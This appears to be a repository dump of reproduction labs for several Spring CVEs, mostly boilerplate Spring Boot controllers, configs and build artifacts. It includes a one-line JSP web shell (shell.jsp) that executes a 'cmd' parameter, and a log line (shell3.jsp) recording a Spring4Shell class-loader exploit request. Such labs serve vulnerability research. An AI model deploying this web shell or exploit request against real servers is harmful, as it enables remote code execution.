/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/HelloController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/HelloController.class
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/axisx/SpringRCEDemo/User.class
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/magiczero/SpringRCEDemo/HelloController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/magiczero/SpringRCEDemo/HelloController.class
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/magiczero/SpringRCEDemo/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/classes/org/magiczero/SpringRCEDemo/User.class
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/aspectjweaver-1.9.7.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/aspectjweaver-1.9.7.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/slf4j-api-1.7.21.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/slf4j-api-1.7.21.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-aop-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-aop-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-aspects-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-aspects-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-beans-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-beans-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-context-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-context-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-context-support-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-context-support-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-core-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-core-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-expression-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-expression-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-jcl-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-jcl-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-ldap-core-2.3.3.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-ldap-core-2.3.3.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-oxm-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-oxm-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-security-core-5.4.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-security-core-5.4.2.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-security-ldap-5.4.2.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-security-ldap-5.4.2.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-test-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-test-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-tx-5.2.11.RELEASE.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-tx-5.2.11.RELEASE.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-web-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-web-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-webmvc-5.3.16.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/lib/spring-webmvc-5.3.16.jar
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/WEB-INF/shell3.jsp:
--------------------------------------------------------------------------------
1 | 10.128.5.250 - - [30/Mar/2022:03:57:25 +0800] "POST /SpringRCEDemo_war_exploded/hello?name=admin&age=2&Class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&Class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=3&Class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&Class.module.classLoader.resources.context.parent.pipeline.first.directory=/Users/dxy/Downloads/SpringRCEDemo/src/main/webapp/&poc=%3C%25out.write(%22This_AxisX%22);%25%3E HTTP/1.1" 200 11
2 | 10.128.5.250 - - [30/Mar/2022:03:57:26 +0800] "GET /SpringRCEDemo_war_exploded/shell3.jsp HTTP/1.1" 404 703
3 | 0:0:0:0:0:0:0:1 - - [30/Mar/2022:03:57:38 +0800] "GET /SpringRCEDemo_war_exploded/shell3.jsp HTTP/1.1" 404 703
4 | 0:0:0:0:0:0:0:1 - - [30/Mar/2022:03:57:41 +0800] "GET /SpringRCEDemo_war_exploded/shell3.jsp HTTP/1.1" 404 703
5 |
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/index.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8" %>
2 |
3 |
4 |
5 | JSP - Hello World
6 |
7 |
8 | <%= "Hello World!" %>
9 |
10 |
11 | Hello Servlet
12 |
13 |
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/shell.jsp:
--------------------------------------------------------------------------------
1 | <%=Runtime.getRuntime().exec(request.getParameter("cmd"))%>
2 |
--------------------------------------------------------------------------------
/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/shell1.jsp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/SpringRCEDemo-1.0-SNAPSHOT/shell1.jsp
--------------------------------------------------------------------------------
/CVE-2022-22965/target/classes/org/axisx/SpringRCEDemo/HelloController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/classes/org/axisx/SpringRCEDemo/HelloController.class
--------------------------------------------------------------------------------
/CVE-2022-22965/target/classes/org/axisx/SpringRCEDemo/User.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/classes/org/axisx/SpringRCEDemo/User.class
--------------------------------------------------------------------------------
/CVE-2022-22965/target/maven-archiver/pom.properties:
--------------------------------------------------------------------------------
1 | artifactId=SpringRCEDemo
2 | groupId=org.magiczero
3 | version=1.0-SNAPSHOT
4 |
--------------------------------------------------------------------------------
/CVE-2022-22965/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst:
--------------------------------------------------------------------------------
1 | org/axisx/SpringRCEDemo/User.class
2 | org/axisx/SpringRCEDemo/HelloController.class
3 |
--------------------------------------------------------------------------------
/CVE-2022-22965/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst:
--------------------------------------------------------------------------------
1 | /Users/dxy/Downloads/SpringRCEDemo/src/main/java/org/axisx/SpringRCEDemo/HelloController.java
2 | /Users/dxy/Downloads/SpringRCEDemo/src/main/java/org/axisx/SpringRCEDemo/GlobalFilter.java
3 | /Users/dxy/Downloads/SpringRCEDemo/src/main/java/org/axisx/SpringRCEDemo/User.java
4 |
--------------------------------------------------------------------------------
/CVE-2022-22965/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22965/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst
--------------------------------------------------------------------------------
/CVE-2022-22978/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image)
9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security)
10 |
11 | ### Guides
12 | The following guides illustrate how to use some features concretely:
13 |
14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/)
15 | * [Spring Boot and OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/)
16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/)
17 |
18 |
--------------------------------------------------------------------------------
/CVE-2022-22978/src/main/java/com/example/demo/Controller/AuthController.java:
--------------------------------------------------------------------------------
1 | package com.example.demo.Controller;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.web.bind.annotation.GetMapping;
5 | import org.springframework.web.bind.annotation.PathVariable;
6 | import org.springframework.web.bind.annotation.ResponseBody;
7 |
8 | @Controller
9 | public class AuthController {
10 | @GetMapping("/")
11 | @ResponseBody
12 | public String index() {
13 | return "welcome";
14 | }
15 |
16 | @GetMapping("/admin/{name}")
17 | @ResponseBody
18 | public String admin(@PathVariable String name) {
19 | return "welcome " + name;
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/CVE-2022-22978/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class DemoApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(DemoApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2022-22978/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 |
--------------------------------------------------------------------------------
/CVE-2022-22978/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2022-22978/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 |
--------------------------------------------------------------------------------
/CVE-2022-22978/target/classes/com/example/demo/Config/AuthConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22978/target/classes/com/example/demo/Config/AuthConfig.class
--------------------------------------------------------------------------------
/CVE-2022-22978/target/classes/com/example/demo/Controller/AuthController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22978/target/classes/com/example/demo/Controller/AuthController.class
--------------------------------------------------------------------------------
/CVE-2022-22978/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22978/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2022-22978/target/test-classes/com/example/demo/DemoApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22978/target/test-classes/com/example/demo/DemoApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2022-22979/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image)
9 | * [Function](https://docs.spring.io/spring-cloud-function/docs/current/reference/html/spring-cloud-function.html)
10 |
11 | ### Additional Links
12 | These additional references should also help you:
13 |
14 | * [Various sample apps using Spring Cloud Function](https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples)
15 |
16 |
--------------------------------------------------------------------------------
/CVE-2022-22979/src/main/java/com/example/demo/LowercaseConfiguration.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.context.annotation.Bean;
4 | import org.springframework.context.annotation.Configuration;
5 | import reactor.core.publisher.Flux;
6 |
7 | import java.util.function.Function;
8 |
9 | @Configuration(proxyBeanMethods = false)
10 | public class LowercaseConfiguration {
11 |
12 | @Bean
13 | public Function, Flux> lowercase() {
14 | return flux -> flux.log().map(value -> new Bar(value.lowercase()));
15 | }
16 |
17 | }
18 |
--------------------------------------------------------------------------------
/CVE-2022-22979/src/main/java/com/example/demo/TestController.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.web.bind.annotation.RequestMapping;
4 | import org.springframework.web.bind.annotation.RestController;
5 |
6 | @RestController
7 | public class TestController {
8 | @RequestMapping("/")
9 | String home() {
10 | return "hello axisx";
11 | }
12 | }
13 |
--------------------------------------------------------------------------------
/CVE-2022-22979/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8089
2 | server.address=10.128.5.250
3 |
4 | spring.cloud.function.definition=test1|test2|test3|test4
--------------------------------------------------------------------------------
/CVE-2022-22979/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2022-22979/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8089
2 | server.address=10.128.5.250
3 |
4 | spring.cloud.function.definition=test1|test2|test3|test4
--------------------------------------------------------------------------------
/CVE-2022-22979/target/classes/com/example/demo/Bar.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/Bar.class
--------------------------------------------------------------------------------
/CVE-2022-22979/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2022-22979/target/classes/com/example/demo/Foo.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/Foo.class
--------------------------------------------------------------------------------
/CVE-2022-22979/target/classes/com/example/demo/LowercaseConfiguration.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/LowercaseConfiguration.class
--------------------------------------------------------------------------------
/CVE-2022-22979/target/classes/com/example/demo/TestController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/classes/com/example/demo/TestController.class
--------------------------------------------------------------------------------
/CVE-2022-22979/target/test-classes/com/example/demo/DemoApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-22979/target/test-classes/com/example/demo/DemoApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2022-31692/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image)
9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security)
10 |
11 | ### Guides
12 | The following guides illustrate how to use some features concretely:
13 |
14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/)
15 | * [Spring Boot and OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/)
16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/)
17 |
18 |
--------------------------------------------------------------------------------
/CVE-2022-31692/src/main/java/com/example/demo/Controller/AuthController.java:
--------------------------------------------------------------------------------
1 | package com.example.demo.Controller;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.web.bind.annotation.GetMapping;
5 | import org.springframework.web.bind.annotation.PathVariable;
6 | import org.springframework.web.bind.annotation.ResponseBody;
7 |
8 | @Controller
9 | public class AuthController {
10 | @GetMapping("/admin")
11 | @ResponseBody
12 | public String admin() {
13 | return "admin page";
14 | }
15 |
16 | @GetMapping("/")
17 | @ResponseBody
18 | public String index() {
19 | return "index";
20 | }
21 |
22 | @GetMapping("/forward")
23 | public String redirect() {
24 | return "forward:/admin";
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/CVE-2022-31692/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class DemoApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(DemoApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2022-31692/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 | spring.security.filter.dispatcher-types = request, error, async, forward, include
3 |
--------------------------------------------------------------------------------
/CVE-2022-31692/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2022-31692/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 | spring.security.filter.dispatcher-types = request, error, async, forward, include
3 |
--------------------------------------------------------------------------------
/CVE-2022-31692/target/classes/com/example/demo/Config/AuthConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-31692/target/classes/com/example/demo/Config/AuthConfig.class
--------------------------------------------------------------------------------
/CVE-2022-31692/target/classes/com/example/demo/Controller/AuthController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-31692/target/classes/com/example/demo/Controller/AuthController.class
--------------------------------------------------------------------------------
/CVE-2022-31692/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-31692/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2022-31692/target/test-classes/com/example/demo/DemoApplicationTests.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-31692/target/test-classes/com/example/demo/DemoApplicationTests.class
--------------------------------------------------------------------------------
/CVE-2023-20860/HELP.md:
--------------------------------------------------------------------------------
1 | # Getting Started
2 |
3 | ### Reference Documentation
4 | For further reference, please consider the following sections:
5 |
6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/)
8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image)
9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security)
10 |
11 | ### Guides
12 | The following guides illustrate how to use some features concretely:
13 |
14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/)
15 | * [Spring Boot and OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/)
16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/)
17 |
18 |
--------------------------------------------------------------------------------
/CVE-2023-20860/src/main/java/com/example/demo/Controller/AuthController.java:
--------------------------------------------------------------------------------
1 | package com.example.demo.Controller;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.web.bind.annotation.GetMapping;
5 | import org.springframework.web.bind.annotation.PathVariable;
6 | import org.springframework.web.bind.annotation.ResponseBody;
7 |
8 | @Controller
9 | public class AuthController {
10 | @GetMapping("/")
11 | @ResponseBody
12 | public String index() {
13 | return "welcome";
14 | }
15 |
16 | @GetMapping("/admin/{name}")
17 | @ResponseBody
18 | public String admin(@PathVariable String name) {
19 | return "welcome " + name;
20 | }
21 |
22 |
23 | @GetMapping("/data")
24 | @ResponseBody
25 | public String data() {
26 | return "get data";
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/CVE-2023-20860/src/main/java/com/example/demo/DemoApplication.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 |
6 | @SpringBootApplication
7 | public class DemoApplication {
8 |
9 | public static void main(String[] args) {
10 | SpringApplication.run(DemoApplication.class, args);
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2023-20860/src/main/resources/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 |
--------------------------------------------------------------------------------
/CVE-2023-20860/src/test/java/com/example/demo/DemoApplicationTests.java:
--------------------------------------------------------------------------------
1 | package com.example.demo;
2 |
3 | import org.junit.jupiter.api.Test;
4 | import org.springframework.boot.test.context.SpringBootTest;
5 |
6 | @SpringBootTest
7 | class DemoApplicationTests {
8 |
9 | @Test
10 | void contextLoads() {
11 | }
12 |
13 | }
14 |
--------------------------------------------------------------------------------
/CVE-2023-20860/target/classes/application.properties:
--------------------------------------------------------------------------------
1 | server.port=8085
2 |
--------------------------------------------------------------------------------
/CVE-2023-20860/target/classes/com/example/demo/Config/AuthConfig.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-20860/target/classes/com/example/demo/Config/AuthConfig.class
--------------------------------------------------------------------------------
/CVE-2023-20860/target/classes/com/example/demo/Controller/AuthController.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-20860/target/classes/com/example/demo/Controller/AuthController.class
--------------------------------------------------------------------------------
/CVE-2023-20860/target/classes/com/example/demo/DemoApplication.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-20860/target/classes/com/example/demo/DemoApplication.class
--------------------------------------------------------------------------------
/CVE-2023-20860/target/test-classes/com/example/demo/DemoApplicationTests.class:
--------------------------------------------------------------------------------
